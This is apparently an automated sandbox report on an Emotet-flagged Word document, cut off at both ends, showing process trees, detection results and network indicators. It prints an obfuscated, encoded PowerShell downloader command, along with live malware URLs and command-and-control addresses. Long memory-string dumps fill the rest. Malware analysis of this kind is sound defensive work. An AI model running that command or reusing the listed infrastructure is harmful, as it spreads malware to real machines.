ZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
      • rundll32.exe (PID: 6760 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • rundll32.exe (PID: 6728 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5616 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x2ba:$s1: POwersheLL
    00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x5b0:$s1: POwersheLL
    • 0x45c0:$s1: POwersheLL
    00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x191c:$s1: POwersheLL
      Click to see the 6 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.2.rundll32.exe.f20000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
        8.2.rundll32.exe.f40000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
          6.2.rundll32.exe.1090000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            6.2.rundll32.exe.1070000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              6.2.rundll32.exe.1070000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                Click to see the 1 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoA

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: https://www.isatechnology.com/training/b/Avira URL Cloud: Label: malware
                Source: http://transfersuvan.com/wp-admin/OVl/Avira URL Cloud: Label: malware
                Source: http://arquivopop.com.br/index_htm_files/Kxh/Avira URL Cloud: Label: malware
                Source: https://cairocad.com/cgi-bin/1PBB/Avira URL Cloud: Label: malware
                Source: http://ownitconsignment.com/files/b/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URLShow sources
                Source: isatechnology.comVirustotal: Detection: 7%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllMetadefender: Detection: 52%Perma Link
                Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllReversingLabs: Detection: 96%
                Multi AV Scanner detection for submitted fileShow sources
                Source: v22Pc0qA.doc.docVirustotal: Detection: 72%Perma Link
                Source: v22Pc0qA.doc.docMetadefender: Detection: 44%Perma Link
                Source: v22Pc0qA.doc.docReversingLabs: Detection: 86%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F593E4 CryptDecodeObjectEx,8_2_00F593E4

                Compliance:

                barindex
                Uses new MSVCR DllsShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                Uses secure TLS version for HTTPS connectionsShow sources
                Source: unknownHTTPS traffic detected: 194.209.195.106:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.208.182.43:443 -> 192.168.2.4:49744 version: TLS 1.2
                Binary contains paths to debug symbolsShow sources
                Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4A461 FindFirstFileW,8_2_00F4A461
                Source: global trafficDNS query: name: physio-svdh.ch
                Source: global trafficTCP traffic: 192.168.2.4:49742 -> 194.209.195.106:443
                Source: global trafficTCP traffic: 192.168.2.4:49742 -> 194.209.195.106:443
                Source: global trafficTCP traffic: 192.168.2.4:49773 -> 50.116.111.59:8080
                Source: Joe Sandbox ViewIP Address: 97.120.3.198 97.120.3.198
                Source: Joe Sandbox ViewIP Address: 97.120.3.198 97.120.3.198
                Source: Joe Sandbox ViewIP Address: 50.116.111.59 50.116.111.59
                Source: Joe Sandbox ViewASN Name: CENTURYLINK-US-LEGACY-QWESTUS CENTURYLINK-US-LEGACY-QWESTUS
                Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /hzctvbal94fl2bqa/ HTTP/1.1DNT: 0Referer: 173.249.20.233/hzctvbal94fl2bqa/Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 173.249.20.233:443Content-Length: 8516Connection: Keep-AliveCache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 97.120.3.198
                Source: unknownTCP traffic detected without corresponding DNS query: 97.120.3.198
                Source: unknownTCP traffic detected without corresponding DNS query: 97.120.3.198
                Source: unknownTCP traffic detected without corresponding DNS query: 70.180.33.202
                Source: unknownTCP traffic detected without corresponding DNS query: 70.180.33.202
                Source: unknownTCP traffic detected without corresponding DNS query: 70.180.33.202
                Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
                Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
                Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F414E6 InternetReadFile,8_2_00F414E6
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
                Source: svchost.exe, 0000000F.00000003.750584532.00000279643EB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-01-28T09:10:05.3582025Z||.||5328ddc5-b339-498a-8e19-ab9110f64f21||1152921505693002334||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                Source: svchost.exe, 0000000F.00000003.750584532.00000279643EB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-01-28T09:10:05.3582025Z||.||5328ddc5-b339-498a-8e19-ab9110f64f21||1152921505693002334||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI",A equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI",A equals www.twitter.com (Twitter)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE@o equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE@o equals www.twitter.com (Twitter)
                Source: svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 